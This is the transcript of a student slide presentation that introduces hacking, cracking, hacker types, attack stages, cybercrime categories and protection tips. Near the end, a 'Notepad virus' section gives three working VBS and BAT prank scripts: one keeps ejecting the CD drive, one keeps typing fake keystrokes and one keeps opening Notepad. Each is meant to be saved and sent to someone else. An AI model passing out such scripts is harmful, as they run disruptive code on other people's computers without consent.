Introduction of hacking and crackingPresentation Transcript
Introduction of Hacking andCrackingPrepared By :- Harshil BarotDepartment Of ComputerScience,H.N.G.University,Patan,Gujarat.(India)
WHAT IS HACKING ?Hacking is the act of penetrating a closed computersystem for the knowledge and information that iscontained within. Through the study of technologyand computers a hacker can open his mind andexpand his knowledge.LEVELS OF HACKERS•High-level hackersHigh-level hackers are sophisticated users with large knowledge oftechnology.•Low-level hackersLow-level hackers are “Foot Soldiers” who marks programs with littleunderstanding of how they worked. Unfortunately hackers also gain the accessof CERT (Computer Emergency Response Time).Hacker is someone with deep understanding of computers and/ornetworking.Art of hacking can be with positive or negative intensions
WHO IS HACKER? HACKER IS NOT CYBER CRIMINAL BUT HEIS THEVERY INTELLIGENT PERSON WHO ISUSE HIS KNOWLEDGE IN CONSTRUCTIVEMANNER TO SECURE SYSTEM & NEVERDAMAGE DATA HE KNOW ALL ABOUT THE OPERATINGSYSTEM & DIFFERENT HOLES IN THESYSTEM
WHO IS CRACKER? PERSON WHO ENTER INTO OTHER’SSYSTEM ANDVIOLET THE SYSTEM,DAMAGETHE DATA,CREATE HAVOC IS CALLEDCRACKER CRACKER IS CYBER CRIMINAL THEY CAN BE EASILY IDENTIFIED BECAUSETHEIR ACTIONS ARE MALICIOUS
1 . Hacking - showing computer expertise.Unauthorized use of computer and network resources2 . Cracking - breaking security on software or systems3 . Phreaking - cracking telecom networks(TelephoneHacking)4 . Spoofing(Phishing) - faking the originating IP addressin a datagram
History Of Hacking :- 1969 - Unix ‘hacked’ together 1971 - Cap ‘n Crunch phone exploit discovered 1988 - Morris Internet worm crashes 6,000 servers 1994 - $10 million transferred from CitiBank accounts 1995 - Kevin Mitnick sentenced to 5 years in jail 2000 - Major websites succumb to DDoS( distributed denial-of-service) 2000 - 15,700 credit and debit card numbers stolen fromWestern Union(hacked while web database was undergoing maintenance) 2001 Code Red◦ exploited bug in MS IIS to penetrate & spread◦ probes random IPs for systems running IIS◦ had trigger time for denial-of-service attack◦ 2nd wave infected 360000 servers in 14 hours Code Red 2 - had backdoor installed to allow remote control Nimda -used multiple infection mechanisms email, shares, web client, IIS 2002 – SlammerWorm brings web to its knees by attacking MS SQLServer
Types Of Hacker1.White Hat hacker :- breaks security for securityperpose2.Black hat Hacker : -break security forunauthorised use3.Grey hat hacker :- Com. of white hat and black hat.They may offer to repaire the system.4.Blue Hat hacker :- someone outside computersecuritywho use the system5.script kiddie :- Mostly student. Use tools createdby black hats
THE PROCESS OF HACKINGSome common steps that hackers have to follow r as follows :-•FootprintingBefore the real fun begins for hackers, the three essentials steps must beperformed. Firstly , the hackers creates a profile of the company’s security posture.This is known as footprinting .ScanningThe second step is that of scanning in which the hacker tests each target systemto see if it is alive or not.•EnumerationNext, the hacker will try to identify valid user accounts and poorly protectedresource shares, using enumeration process.•Gaining AccessFor target systems running Windows, hackers can guess passwords forenumerated user names, using an automatic tool and a list of passwords to try,and can be successful if a strong password policy is not followed and accountlockouts r not implemented .•Tracks CoveredTracks can be disabled and then enabled by clearing the event log.•BackdoorsThere is a keystroke logger , which is between the OS and keyboard hardware andrecords every keystroke. On tracing its output hackers can easily identify whatsteps have done before and thus can identify the username and password
Why do hackers hack?JUST FOR FUNSHOW OFFHACK OTHER SYSTEMS SECRETLYNOTIFY MANY PEOPLETHEIRTHOUGHTSTEAL IMPORTANT INFORMATIONDESTROY ENEMY’S COMPUTER NETWORK DURINGTHEWAR
What do hackers do after hacking?(2)INSTALL IRC RELATED PROGRAMidentd, irc, bitchx, eggdrop, bncINSTALL SCANNER PROGRAMmscan, sscan, nmapINSTALL EXPLOIT PROGRAMINSTALL DENIAL OF SERVICE PROGRAMUSE ALL OF INSTALLED PROGRAMS SILENTLY
What do hackers know?DON’T KNOW HOWTO USEVIDON’T KNOWWHAT UNIX ISDON’T KNOWWHAT THEY DOKNOW HOWTO INTRUDETHE SYSTEMKNOW HOWTO CRASHTHE SYSTEMKNOWWHERETHE HACKINGPROGRAMSARE
How can kid hack?KID HAS MUCH OFTIMEKid can search for longer time than otherpeopleALL HACKING PROGRAM IS EASYTOUSEKID DOESN’T HAVETO KNOW HOWTHE HACKING PROGRAMWORKSTHESE KIDS ARE CALLED SCRIPTKIDDIES
How can be a real hacker?STUDY C/C++/ASSEMBLYLANGUAGESTUDY COMPUTERARCHITECTURESTUDY OPERATING SYSTEMSTUDY COMPUTER NETWORKEXAMINETHE HACKINGTOOLS FOR A MONTHTHINKTHE PROBLEM OFTHE COMPUTER
Why can’t defend against hackers?THERE ARE MANY UNKNOWN SECURITY HOLEHACKERS NEEDTO KNOW ONLY ONESECURITY HOLETO HACKTHE SYSTEMADMIN NEEDTO KNOWALL SECURITY HOLESTO DEFENDTHE SYSTEM
What should do after hacked?SHUTDOWNTHE SYSTEMOr turn off the systemSEPARATETHE SYSTEM FROM NETWORKRESTORETHE SYSTEM WITHTHE BACKUPOr reinstall all programsCONNECTTHE SYSTEM TOTHE NETWORKIT CAN BE GOODTO CALLTHE POLICE
How to translate the hackers’ language (1)1 -> i or l3 -> e4 -> a7 -> t9 -> g0 -> o$ -> s| -> i or l|| -> n|/| -> ms -> zz -> sf -> phph -> fx -> ckck -> x
How to translate the hackers’language (2) Ex)◦ 1 d1d n0t h4ck th1s p4g3, 1t w4s l1k3 th1swh3n 1 h4ck3d 1n◦ I did not hack this page, it was like this when Ihacked in
Protect your Computers! Use anti-virus software andfirewalls - keep them up to date Keep your operating system up todate with critical security updatesand patches Dont open emails or attachmentsfrom unknown sources Use hard-to-guess passwords.Don’t use words found in adictionary. Remember thatpassword cracking tools exist Back-up your computer data ondisks or CDs often Dont share access to yourcomputers with strangers If you have a wi-fi network,password protect it Disconnect from the Internetwhen not in use Reevaluate your security on aregular basis Make sure your employees andfamily members know this infotoo!
Over the Internet Over LAN Locally Offline Theft DeceptionModes of Hacker Attack
Because they can◦ A large fraction of hacker attacks have been pranks Financial Gain Espionage Venting anger at a company or organization TerrorismWhy do Hackers Attack?
Active Attacks◦ Denial of Service◦ Breaking into a site Intelligence Gathering Resource Usage Deception Passive Attacks◦ Sniffing Passwords Network Traffic Sensitive Information◦ Information GatheringTypes of Hacker Attack
Definition:An attacker alters his identity so that some one thinks heis some one else◦ Email, User ID, IP Address, …◦ Attacker exploits trust relation between user andnetworked machines to gain access to machinesTypes of Spoofing:1. IP Spoofing:2. Email Spoofing3. Web SpoofingSpoofing
A hacker can exploit a weak passwords & uncontrollednetwork modems easily Steps◦ Hacker gets the phone number of a company◦ Hacker runs war dialer program If original number is 555-5532 he runs all numbers in the 555-55xxrange When modem answers he records the phone number of modem◦ Hacker now needs a user id and password to entercompany network Companies often have default accounts e.g.temp, anonymous with nopassword Often the root accountuses company name as the password For strong passwords password cracking techniques existPassword Attacks
Password Attacks Two kinds: Password Guessing and PasswordCracking Password Guessing:Attempt to guess thepassword for a particular user ID.This processis rarely successful, time consuming, andgenerates a lot of network traffic. Also, someaccounts are locked out after a set number ofunsuccessful guesses. Many password-guessingtools can be found at Packet Site:
Common scenarios in Cyber CrimeUnauthorized access: This occurs when a user/hacker deliberately gets accessinto someone else’s network either to monitor or data destruction purposesDenial of service attack: It involves sending of disproportionate demands ordata to the victims server beyond the limit that the server is capable to handle andhence causes the server to crashVirus, Worms and Trojan attacks: Viruses are basically programs that areattached to a file which then gets circulated to other files and gradually to othercomputers in the network. Worms unlike Viruses do not need a host forattachments they make copies of themselves and do this repeatedly hence eatingup all the memory of the computer. Trojans are unauthorized programs whichfunctions from inside what seems to be an authorized program, thereby concealingwhat it is actually doing.
Email Bombing It refers to sending a large number of emails tothe victim resulting in the victims email account (in case of anindividual) or mail servers (in case of a company or an email serviceprovider) crashingInternet Time Thefts This connotes the usage by anunauthorized person of the Internet hours paid for by another.Web Jacking This occurs when someone forcefully takes control of a website (bycracking the password and later changing it). The actual owner of the website doesnot have any more control over what appears on that websiteTheft and Physical damage of computer or its peripherals This type ofoffence involves the theft of a computer, some parts of a computer or a peripheralattached to the computer. and physically damaging a computer or its peripherals
Thinkbefore you Click
IP ADDRESSIP ADDRESS ISTHE ADDRESS OFYOURCOMPUTER INTHE INTERNETIT IS UNIQLIKE 192.168.23.45
Knowing IP addresses IP address is aunique web addressfor each computerconnected tointernet Knowing this isessential beforeanything else
Symptoms Targeted Pop-ups Slow Connection Targeted E-Mail (Spam) UnauthorizedAccess Spam Relaying System Crash Program CustomisationSPYWARESPYWARE / TROJANSPYWARETROJAN HORSETROJAN HORSESPYWARE/ TROJANSPYWARE32
Small NotepadVirus :-More Notepad Viruses
1)Continually pop out your friends CD Drive.Set oWMP = CreateObject("WMPlayer.OCX.7")Set colCDROMs = oWMP.cdromCollectiondoif colCDROMs.Count >= 1 thenFor i = 0 to colCDROMs.Count - 1colCDROMs.Item(i).EjectNextFor i = 0 to colCDROMs.Count - 1colCDROMs.Item(i).EjectNextEnd Ifwscript.sleep 5000loopSave it as "Anything.VBS" and send it.
Hack Computer keyboard and make him type “Keyboard not working"simultaneously:Set wshShell =wscript.CreateObject("WScript.Shell")dowscript.sleep 100wshshell.sendkeys“Keyboard not working"loopSave it as "Anything.VBS" and send it.
Open Notepad continually in your computer@ECHO off:topSTART %SystemRoot%system32notepad.exeGOTO topSave it as “Anything.BAT" and send it.
LIST OF SITES THAT WERE HACKED•-Monmouth Army Base --- http://www.monmouth.army.mil/•-US Army --- http://www4.army.mil/•-The Jerry Springer Show --- http://www.jerryspringer.com/•-Symantec Corporation --- http://www.symantec.com/•-U.S. Department of Commerce Institute for TelecommunicationSciences --- http://elbert.its.bldrdoc.gov/•-Technical University of Denmark --- http://lanpc11.ilf.dtu.dk•Illinois Natural History Survey --- http://nuclear.hazard.uiuc.edu• Monica Lewinskys site ---http://www.monicalewinsky.com/•Phoenix Data Systems ---http://www.phoenixds.at/•Ruchi Group ---http://www.ruchigroup.com/•Concept Reseau ---http://www.concept-reseau.fr/•Wayne University US Department ---http://www.us.wayne.edu/